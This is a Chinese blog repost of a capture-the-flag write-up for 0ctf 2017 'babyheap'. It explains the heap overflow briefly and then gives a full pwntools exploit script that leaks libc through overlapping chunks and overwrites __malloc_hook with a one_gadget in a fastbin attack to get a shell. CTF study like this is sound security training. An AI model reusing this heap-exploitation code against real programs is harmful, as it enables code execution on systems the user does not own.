本文主要是介绍0ctf_2017_babyheap，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

0ctf_2017_babyheap

查看保护


edit可以改size，堆溢出，overlapping泄露libc。fastbin attack改hook为onegadget即可getshell。overlapping和fastbin的攻击手法具体看z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27786)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Command: '

def add(size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Size: ', str(size))

def edit(index, size, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Size: ', str(size))
    r.sendafter('Content: ', content)

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index: ', str(index))

def show(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Index: ', str(index))

add(0x10)   #0
add(0x40)   #1
add(0x30)   #2
add(0x10)   #3

p1 = b'a' * 0x18 + p64(0x91)
edit(0, len(p1), p1)

delete(1)

add(0x40)
show(2)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
success('malloc_hook = ' + hex(malloc_hook))

libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
one = [0x45216, 0x4526a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base

add(0x30)   #4

add(0x60)   #5
add(0x10)   #6

delete(5)
p2 = b'a' * 0x18 + p64(0x71) + p64(malloc_hook - 0x23)
edit(3, len(p2), p2)

add(0x60)
add(0x60)   #7

p3 = b'\0' * 0x13 + p64(one_gadget)
edit(7, len(p3), p3)

add(0x10)

r.interactive()

这篇关于0ctf_2017_babyheap的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！